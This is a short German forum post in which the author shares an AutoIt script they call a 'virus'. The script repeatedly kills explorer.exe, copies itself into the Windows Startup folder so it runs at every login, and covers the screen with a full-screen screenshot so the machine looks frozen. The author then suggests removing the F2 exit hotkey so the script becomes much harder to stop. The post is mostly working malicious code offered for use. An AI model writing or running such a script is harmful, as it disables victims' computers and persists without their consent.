dann bin ich auf die idee gekommen einen "virus" zu scripten.
dass kam dabei raus:
Code:
HotKeySet ("{f2}", "ende")
#include <ScreenCapture.au3>
#include <WindowsConstants.au3>
#include <GUIConstantsEx.au3>
For $1 = 1 to 500
If ProcessExists("Explorer.exe") Then
ProcessClose("Explorer.exe")
EndIf
Next
FileCreateShortcut( @ScriptFullPath, @StartupDir & "\" & @ScriptName & ".lnk" )
_ScreenCapture_Capture(@MyDocumentsDir &"\b.jpg")
GUICreate("",@desktopwidth,@desktopheight,0,0,$WS_POPUP,$WS_EX_TOPMOST)
$pic = GUICtrlCreatePic(@MyDocumentsDir &"\b.jpg",0,0,@desktopwidth,@desktopheight)
GUISetState()
while 1
ProcessClose ("explorer.exe")
GUICtrlSetState($pic,$GUI_HIDE)
GUICtrlSetState($pic,$GUI_SHOW)
WEnd
Func ende()
run ("explorer.exe")
Exit
EndFunc
wenn ihr wollt könnt ihr auch die funktion ende weglassen dann wirds um einiges schwerer den wieder abzustellen...








